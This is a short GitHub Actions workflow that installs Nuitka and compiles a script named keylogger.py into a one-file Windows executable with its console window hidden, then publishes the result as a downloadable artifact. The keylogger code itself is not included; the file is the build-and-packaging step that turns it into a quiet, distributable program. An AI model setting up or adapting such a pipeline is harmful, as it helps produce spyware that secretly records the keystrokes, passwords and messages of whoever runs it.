name: Build EXE with Nuitka

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Set up Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.11'  # or whatever version you're using

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install nuitka
        pip install -r requirements.txt

    - name: Compile to EXE with Nuitka
      env:
        NUITKA_DOWNLOAD_DEPENDENCIES_AUTO: "yes"
      run: |
        nuitka keylogger.py --standalone --onefile --windows-disable-console --assume-yes-for-downloads


    - name: Upload EXE as artifact
      uses: actions/upload-artifact@v4
      with:
        name: compiled-exe
        path: keylogger.exe
